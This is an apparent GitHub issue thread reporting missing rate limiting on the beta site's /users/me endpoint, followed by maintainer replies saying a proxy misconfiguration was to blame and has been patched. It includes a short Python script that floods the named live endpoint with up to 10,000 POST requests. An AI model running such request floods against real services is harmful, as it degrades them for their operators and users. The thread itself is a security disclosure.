### ISSUE TITLE
No ratelimit @ /users/me causing DOS

### ISSUE THREAD

**Issue by suffocated** [discordlist-gg/beta-issues#38]
## Description
There is no ratelimit at the endpoint, /users/me, further causing denial of service.

## Possible Solution
Fix a ratelimit

## Script used in this example
```py
import requests
n = 0

for n in range(1, 10000):
    n = n + 1
    n = str(n)

    response = requests.post(
        "https://beta.discordlist.gg/v0/users/me", 

        headers= {
            "cookie": " "
        },

        json= {
            "bio": f"Request nr, {n}",
            "display_name": "Caasi"
        }
    )

    print(f"[+] {response} @ {n} tries.\nJSON response: {response.text}")


```

**Comment by OhB00** [comment]
Proof of denial of service?

**Comment by ChillFish8** [comment]
miss configured service on the proxy when they set up beta. As it stands rn beta bypasses all rate limits.

**Comment by ChillFish8** [comment]
While this is only due to how beta is set up and won't be a thing in prod. This has been patched.
